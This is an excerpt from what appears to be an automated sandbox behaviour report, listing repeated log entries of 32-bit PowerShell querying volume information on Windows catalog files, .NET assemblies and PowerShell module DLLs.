Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
